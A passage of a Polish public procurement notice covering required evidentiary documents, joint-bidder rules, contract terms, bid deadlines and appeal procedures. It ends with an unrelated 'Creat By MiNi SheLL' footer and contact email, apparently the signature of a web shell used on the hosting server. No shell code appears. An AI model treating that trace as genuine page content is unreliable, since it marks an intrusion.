podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/> podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego (na podstawie art. 108 i 109<br/> ustawy Pzp), zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/> krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia tj. (art. 274<br/> ust. 1 ustawy Pzp):<br/> 1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/> zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/> wymagają wpisu do rejestru lub ewidencji - w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie<br/> zamówienia w okolicznościach, o których mowa w art. 109 ust. 1 pkt 4 ustawy Pzp;- chyba że Wykonawca w Formularzu Oferty lub oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, wskaże dane<br/> umożliwiające dostęp do tych dokumentów samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych;<br/> Dotyczy również wszystkich wykonawców wspólnie ubiegających o zamówienie, jak również w odniesieniu do podmiotów<br/> udostępniających zasoby Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający<br/> posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/> Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.<br/> 1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast<br/> 1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o<br/> którym mowa w Rozdziale XIII ust. 1 pkt 1.1 litera b) SWZ – składa dokument lub dokumenty wystawione w kraju, w którym<br/> wykonawca ma<br/> siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/> a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/> wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/> podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/> Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/> 2. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument<br/> dotyczy, nie wydaje się dokumentów, o których mowa w Rozdziale XIII ust. 1 pkt 1.1 litera b) SWZ, w § 4 ust. 1 Rozp., o których<br/> mowa w art. 128 ust. 6 ustawy lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w SWZ, zastępuje<br/> się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby<br/> albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub,<br/> jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument<br/> miał dotyczyć, nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/> notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania<br/> wykonawcy lub miejsce zamieszkania osoby, której dokument miał dotyczyć.<br/> (...) CIĄG DALSZY zawierają zapisy Rozdziału XIII ust. 3 SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> A: Wypełniony i podpisany FORMULARZ OFERTY- którego wzór stanowi załącznik nr 1 do SWZ.<br/> 1.1 OŚWIADCZENIE WSTĘPNE (art. 125 ust 1 ustawy Pzp),- załącznik nr 2 do SWZ w zakresie wskazanym przez<br/> Zamawiającego w Rozdziale XI ust. 2 SWZ- załącznik nr 3/3a do SWZ w zakresie wskazanym przez Zamawiającego w<br/> Rozdziale XII ust. 1 SWZ.- w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/> spełnieniu warunków udziału w postępowaniu składa ich pełnomocnik.<br/> 1.2 ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY Wykonawca, który polega na zdolnościach lub sytuacji<br/> podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania<br/> mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/> potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów- wzór<br/> zobowiązania stanowi załącznik nr 4 do SWZ.<br/> 1.3 OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIA (konsorcjum, spółka<br/> cywilna itp.)- wzór oświadczenia stanowi załącznik nr 6 do SWZ (jeżeli dotyczy).<br/> Uwaga: Oświadczenie ma być złożone wraz z ofertą (jeżeli dotyczy). Oświadczenie ma być podpisane przez każdego z<br/> wykonawców występujących wspólnie.<br/> 1.4 PEŁNOMOCNICTWA<br/> Mają być złożone w formie oryginału lub kopii poświadczonej notarialnie (jeżeli dotyczy):<br/> a) w przypadku podpisania oferty przez osoby nie wymienione w odpisie z właściwego rejestru - pełnomocnictwo do<br/> podpisania oferty lub podpisania oferty i zawarcia umowy<br/> b) w przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli<br/> każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu o udzielenie zamówienia albo<br/> reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego- pełnomocnictwo może być<br/> sporządzone wg. wzoru stanowiącego załącznik nr 5 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegółowe informacje, zawarto w Rozdziale X SWZ<br/> 1. Wymagane oświadczenia wskazane w w Rozdziale XVII ust. 3 pkt 2) oraz pkt. 3) SWZ powinny być złożone przez 2. W<br/> przypadku, o którym mowa w art. 117 ust. 2 i 3 stawy Pzp, wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/> (konsorcjum, spółka cywilna itp.) dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/> dostawy lub usługi wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy Pzp) - wzór oświadczenia stanowi załącznik nr<br/> 6 do SWZ.<br/> 3. Wykonawcy składający ofertę wspólną zobowiązani są do ustanowienia Pełnomocnika do reprezentowania ich w<br/> postępowaniu albo Pełnomocnika do reprezentowania ich w postępowaniu oraz do zawarcia umowy w sprawie zamówienia<br/> patrz: Rozdział X SWZ.<br/> Dokument lub dokumenty zawierający ustanowienie Pełnomocnika stanowi załącznik nr 5 do SWZ) musi zawierać w<br/> udzielenie zamówienia, wskazanie ustanowionego Pełnomocnika i zakres jego umocowania. Dokument (lub dokumenty)<br/> zawierający ustanowienie Pełnomocnika musi być podpisany w imieniu wszystkich wykonawców ubiegających się wspólnie<br/> o udzielenie zamówienia, przez osoby uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze lub<br/> ewidencji wykonawców. Ustanowienie przedmiotowego Pełnomocnika może zostać zawarte w umowie o współdziałaniu<br/> złożonej wraz z ofertą. Dokument (lub dokumenty) zawierający ustanowienie Pełnomocnika musi wykazania braku istnienia<br/> wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w<br/> postępowaniu, składa oświadczenia wskazane w w Rozdziale XVII ust. 3 pkt 2) oraz pkt. 3) SWZ zawierające informacje<br/> dotyczące tych podmiotów.<br/> 6. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem.<br/> 7. Wypełniając formularz oferty, jak również inne dokumenty, powołując się na wykonawcę, w miejscu np. nazwa i adres<br/> wykonawcy, należy wpisać dane dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia, a nie<br/> Pełnomocnika tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/> w art. 454-455 ustawy Pzp oraz w zakresie wskazanym w projektowanych postanowieniach umowy.<br/> Szczegółowe zapisy odnośnie przewidywanych zmian umowy, zawarto w §15 projektowanych postanowień umowy<br/> stanowiących załącznik nr 7 do SWZ.<br/> Zmiana umowy wymaga dla swej ważności, zachowania formy pisemnej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-31 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamowienia https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-31 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Środki ochrony prawnej określone w niniejszym dziale przysługują wykonawcy, uczestnikowi konkursu oraz innemu<br/> podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia lub nagrody w konkursie oraz poniósł lub może ponieść<br/> szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy.<br/> 2. Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub ogłoszenia o<br/> konkursie oraz dokumentów zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 469 pkt<br/> 15 Pzp, oraz Rzecznikowi Małych i Średnich Przedsiębiorców.<br/> 3. Postępowanie odwoławcze jest prowadzone w języku polskim.<br/> 4. Wszystkie dokumenty przedstawia się w języku polskim, a jeżeli zostały sporządzone w języku obcym, strona oraz<br/> uczestnik postępowania odwoławczego, który się na nie powołuje, przedstawia ich tłumaczenie na język polski. W<br/> uzasadnionych przypadkach Izba może żądać przedstawienia tłumaczenia dokumentu na język polski poświadczonego<br/> przez tłumacza przysięgłego.<br/> 5. Odwołanie przysługuje na:<br/> a) niezgodną z przepisami ustawy czynność zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, o zawarcie<br/> umowy ramowej, dynamicznym systemie zakupów, systemie kwalifikowania wykonawców lub konkursie, w tym na<br/> projektowane postanowienie umowy;<br/> b) zaniechanie czynności w postępowaniu o udzielenie zamówienia, o zawarcie umowy ramowej, dynamicznym systemie<br/> zakupów, systemie kwalifikowania wykonawców lub konkursie, do której zamawiający był obowiązany na podstawie ustawy;<br/> c) zaniechanie przeprowadzenia postępowania o udzielenie zamówienia lub zorganizowania konkursu na podstawie ustawy,<br/> mimo że zamawiający był do tego obowiązany.<br/> 6. Odwołanie wnosi się do Prezesa Izby.<br/> 7. Odwołujący przekazuje Zamawiającemu odwołanie wniesione w formie elektronicznej albo postaci elektronicznej albo<br/> kopię tego odwołania, jeżeli zostało ono wniesione w formie pisemnej, przed upływem terminu do wniesienia odwołania w<br/> taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu.<br/> 8. Domniemywa się, że zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu do jego wniesienia,<br/> jeżeli przekazanie odpowiednio odwołania albo jego kopii nastąpiło przed upływem terminu do jego wniesienia przy użyciu<br/> środków komunikacji elektronicznej.<br/> 9. Odwołanie wnosi się w przypadku zamówień, których wartość jest mniejsza niż progi unijne, w terminie:<br/> a) 5 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja<br/> została przekazana przy użyciu środków komunikacji elektronicznej,<br/> b) 10 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli<br/> informacja została przekazana w sposób inny niż określony w lit. a.<br/> 10. Odwołanie wobec treści ogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub konkurs lub wobec<br/> treści dokumentów zamówienia wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień<br/> Publicznych lub dokumentów zamówienia na stronie internetowej, w przypadku zamówień, których wartość jest mniejsza niż<br/> progi unijne.<br/> 11. Odwołanie w przypadkach innych niż określone powyżej wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy<br/> zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego<br/> wniesienia, w przypadku zamówień, których wartość jest mniejsza niż progi unijne.<br/> 12. Na orzeczenie Krajowej Izby Odwoławczej oraz postanowienie Prezesa Krajowej Izby Odwoławczej, o którym mowa w<br/> art. 519 ust. 1 ustawy PZP, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sadu. Skargę<br/> wnosi się do Sadu Okręgowego w Warszawie za pośrednictwem Prezesa Krajowej Izby Odwoławczej.<br/> 13. Szczegółowe informacje dotyczące środków ochrony prawnej określone są w Dziale IX „Środki ochrony prawnej” ustawy<br/> PZP

Creat By MiNi SheLL
Email: jattceo@gmail.com